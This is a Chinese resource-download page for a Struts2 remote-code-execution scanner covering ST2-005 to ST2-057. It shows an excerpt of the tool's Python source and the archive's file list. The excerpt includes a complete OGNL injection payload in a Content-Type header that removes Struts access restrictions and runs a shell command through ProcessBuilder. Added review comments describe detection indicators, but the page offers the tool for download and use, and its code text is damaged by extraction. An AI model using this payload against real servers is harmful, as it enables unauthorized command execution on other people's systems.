资源简介
Struts2 漏洞检测工具,可快速检测 Struts 命令执行漏洞,支持批量检测。运行环境要求:Mac/Linux 下的 Python 2、Python 3。支持检测以下漏洞:ST2-005、ST2-008、ST2-009、ST2-013、ST2-016、ST2-019、ST2-020、ST2-devmode、ST2-032、ST2-033、ST2-037、ST2-045、ST2-046、ST2-048、ST2-052、ST2-053、ST2-057。
代码片段和文件信息
#!/usr/bin/env python
# coding=utf-8
# code by Lucifer
# Date 2017/10/22
import re
import sys
import socket
import base64
import httplib
import warnings
import requests
from termcolor import cprint
from urlparse import urlparse
# NOTE(review): in this listing the string delimiters are typographic quotes
# (extraction damage), so the lines below do not parse as shown.

# Silence every warning category for the whole process. With requests imported
# above, this would also hide any certificate-verification warnings the HTTP
# stack raises - whether verification is disabled is not visible in this excerpt.
warnings.filterwarnings(“ignore“)
# Python 2-only idiom: reload(sys) restores sys.setdefaultencoding (removed at
# interpreter startup), which then switches the process-wide implicit
# str/unicode codec to UTF-8.
reload(sys)
sys.setdefaultencoding(‘utf-8‘)
# Override httplib's private class-level protocol version, so connections made
# through httplib.HTTPConnection go out as HTTP/1.0 instead of the default.
# Defender's view: HTTP/1.0 requests are a trait that shows up in access logs.
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = ‘HTTP/1.0‘
# Timeout setting. Presumably seconds handed to the HTTP calls - the use of
# TMOUT is not visible in this excerpt.
TMOUT=10
# NOTE(review): this listing is extraction-damaged - typographic quotes replace
# the string delimiters and the commas between entries (and inside the header
# values) are missing - so the three dicts below do not parse as shown.

# Default request headers: a broad Accept list, a fixed Safari 5.1 / Mac OS X
# 10.6.8 User-Agent and a form-encoded Content-Type. The User-Agent is a
# constant string, so it is a usable (though easily changed) log indicator.
headers = {
“Accept“:“application/x-shockwave-flash image/gif image/x-xbitmap image/jpeg image/pjpeg application/vnd.ms-excel application/vnd.ms-powerpoint application/msword */*“
“User-Agent“:“Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML like Gecko) Version/5.1 Safari/534.50“
“Content-Type“:“application/x-www-form-urlencoded“
}
# Same User-Agent and Accept, but the Content-Type value is an OGNL expression
# wrapped in %{...} instead of a media type. As written, the expression lifts
# the OGNL member-access restrictions, runs the fixed command "netstat -an"
# through java.lang.ProcessBuilder (cmd.exe or /bin/bash, chosen from os.name)
# and copies the process output into the HTTP response.
# Which check sends headers2 is not visible in this excerpt; presumably it is
# one of the header-based checks in the page's list (e.g. ST2-045) - confirm
# against the full file.
# Detection: a legitimate Content-Type never starts with "%{" nor contains
# "ognl.OgnlContext", "#_memberAccess" or "java.lang.ProcessBuilder"; any of
# these in a request header is a strong WAF / access-log indicator.
# Incident response: this is an active check - if a response to such a request
# contains netstat output, the command did execute on that host.
headers2 = {
“User-Agent“:“Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML like Gecko) Version/5.1 Safari/534.50“
“Accept“:“application/x-shockwave-flash image/gif image/x-xbitmap image/jpeg image/pjpeg application/vnd.ms-excel application/vnd.ms-powerpoint application/msword */*“
“Content-Type“:“%{(#nike=‘multipart/form-data‘).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘netstat -an‘).(#iswin=(@java.lang.System@getProperty(‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘‘/c‘#cmd}:{‘/bin/bash‘‘-c‘#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream()#ros)).(#ros.flush())}“
}
# Headers declaring an XML request body (Content-Type: application/xml).
# Presumably used by the ST2-052 check, going by the name - the request body
# and the call site are not visible in this excerpt.
headers_052 = {
“Accept“:“text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8“
“User-Agent“:“Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML like Gecko) Version/5.1 Safari/534.50“
“Content-Type“:“application/xml“
}
class struts_baseverify:
def __init__(self url):
self.url = url
self.poc = {
“ST2-005“:base64.b64decode(“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
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2018-09-05 10:46 struts-scan-master\
文件 1331 2018-09-05 10:46 struts-scan-master\README.md
目录 0 2018-09-05 10:46 struts-scan-master\images\
文件 101622 2018-09-05 10:46 struts-scan-master\images\exp.png
文件 429184 2018-09-05 10:46 struts-scan-master\images\poc.png
文件 6551592 2018-09-05 10:46 struts-scan-master\struts-scan
文件 5953600 2018-09-05 10:46 struts-scan-master\struts-scan.exe
文件 49906 2018-09-05 10:46 struts-scan-master\struts-scan2.py
文件 115 2018-11-07 10:14 struts-scan-master\start.bat
文件 50061 2018-11-06 09:39 struts-scan-master\struts-scan3.py